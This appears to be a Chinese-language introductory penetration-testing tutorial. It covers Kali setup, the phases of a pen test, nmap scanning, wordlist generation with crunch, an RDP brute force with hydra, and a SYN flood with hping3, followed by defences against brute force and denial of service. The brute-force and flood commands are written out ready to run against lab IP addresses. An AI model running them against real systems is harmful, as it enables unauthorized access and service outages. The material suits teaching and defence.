目录
kali
说到渗透测试就离不开kali,我们先介绍kali
什么是kali:Kali是基于Debian Linux的开源的用于渗透测试、网络攻防的操作系统
格式
解释
root:用户名 kali:主机名 ~:当前的用户的家目录下面 #:超级管理员权限
注:kali的linux版本是debian的,我们平时用的linux是 centos redhat 但是各种的linux版本的命令都差不多的 所以就按照linux命令干就是
命令:sudo - i (普通用户)提权(很重要)
kali配置软件源
vim /etc/apt/source.list //打开软件源配置文件
deb https://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src https://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb https://repo.huaweicloud.com/kali kali-rolling main non-free contrib
deb-src https://repo.huaweicloud.com/kali kali-rolling main non-free contrib
//把阿里云,华为云的软件源添加进去
更新软件源
apt-get update
如果出现‘签名错误’就先下载签名
wget archive.kali.org/archive-key.asc //下载签名
apt-key add archive-key.asc //安装签名
渗透测试7个流程
前期交互:甲方和乙方确定条件,价格,授权书....
信息收集:域名解析,收集域名,收集关于要打的IP地址所有信息
威胁建模:构造攻击模型,例如:从内网还是外网渗透进去
漏洞分析:根据扫描工具扫出来或者手工测试出来的漏洞进行分析,如何利用
渗透攻击:正式攻击的阶段
后渗透攻击:提权操作,放木马或者病毒
渗透测试报告:对于这次渗透测试的报文
网络探测
nmap:一款开源的网络探测器,可以快速扫描单个主机或者大型网络
作用:查看端口,服务版本,漏洞,域名
常用的命令
1. nmap 完整扫描
nmap –T4 –A -v 192.168.10.100
2. 在同一个网段 或者在 不同的网段(数量少)
nmap 192.168.1.100 192.168.1.105
nmap 192.168.1.100-105
3. 扫描整个c段:
nmap 192.168.0.100/24
4. 除开例外不扫描(关键字:exculde)
nmap 192.168.10.100/24 exclude 192.168.10.120
5. 识别操作系统
nmap –O 192.168.10.100
6. 检测漏洞
nmap –script=vuln 192.168.10.100
7. 子域名检测
nmap –script external 192.168.10.100
注:nmap的全面扫描很有用但是时间也很长,自己可以开一个终端执行全面扫描,另外一个终端执行小型扫描
密码爆破
什么是密码爆破:暴力破解,也称为“密码穷举”,列出各种可能的密码,用来尝试去访问目标系统,理论上任何密码都可以用这种方法来破解,不过越复杂的密码破解耗时也越长
最常见的密码:password ,123456,123456789
密码生成
这里小编提供一个测试密码复杂度的网站
How Secure Is My Password? | Password Strength Checker
社工库密码字典:
kali内部自带的密码生成器:crunch
用法: crunch + 最小长度 + 最大长度 + 素材字符**
示例1:crunch 6 6 0123456789 //随机组成6位纯数字密码
示例2:crunch 6 8 Abc1234 //由Abc1234随机组成的6~8位密码
示例3:crunch 8 8 -t A%% -o pass.txt // 以A开头2位数字组成的3位密码,保存为pass.txt文件
-o 输出
特殊匹配字符:
@ --> 代表小写字母
, --> 代表大写字母
% --> 代表数字
^ --> 代表标点及特殊字符
我们用什么工具破解呢:
hydra:海德拉,一款功能强大的开源密码攻击工具,支持多种协议的破解
格式:hydra [选项] 目标地址 服务类型**
-l 指定用户名
-L 指定用户名字典文件
-P 指定密码字典文件
-o 将结果输出到指定文件
-v 显示破解过程
-t 同时执行的任务数,默认16个
crunch 7 7 -t pwd%%%% -o p1.txt //产生开头pwd后面4位数字的长度7位密码
hydra -l Administrator -P p1.txt 192.168.10.142 rdp
如何防密码爆破
设置长度足够复杂的密码,定期修改密码,做系统加固,设置的登录次数限制,启用账户锁定阈值
指定ip可以连接自己的电脑:
开始 — 控制面板 — Windows防火墙 — 高级设置 — 入站规则
新建规则 如下图: 允许端口 52011 作用域:远程IP地址 192.168.10.1
拒绝服务攻击
什么是拒绝服务:通过各种手段,最终导致目标系统崩溃、失去响应,从而使目标系统不能为正常的用户提供资源或对应的功能,也称dos攻击
常见的dos攻击
syn flood 泛洪 / ping flood 泛洪 / udp flood 泛洪
hping3 常见选项
--syn:设置SYN标记(-S)
-p:指定目标端口
-a:伪造源地址欺骗
-d: 指定数据包的大小
--flood:泛洪,尽最快发送数据包,不显示回复
--rand-source:随机源地址模式
hping3 192.168.10.145 --syn --flood -p 3389
//hping3 + 目标IP地址 + 指定syn标记 + 泛洪 + p(指定端口)+ 端口
验证:在攻击过程中,远程主机,发现无法连接远程
DDOS
什么是ddos:是dos的‘pro’分布是拒绝服务,
一种典型的流量攻击,放大版的DoS攻击,攻击方的主机数量呈现规模化;
通常由分布在不同网络、不同位置的成千上万的主机组成攻击方(通常称为botnet僵尸网络),被同一发起者所控制,攻击强度更大,防御的难度也更大。
例如:一台主机攻击3389端口 一台主机攻击23端口 一台主机攻击22端口 来自不同的地方攻击 IP地址封不完根本封不完,就会导致服务器瘫痪,导致无法服务
防御拒绝服务攻击
1)提高服务方的交付能力
减少服务配置的等待时间
优化单一客户机的并发响应策略
更换高性能设备
增加网络带宽
负载均衡架构
部署CDN内容分发网络
2)部署专用软硬件防御产品
冰盾防火墙
流量清洗、 DDoS高防IP
IDS入侵检测设备
抗DDoS专用防火墙设备
识别源IP,植入黑名单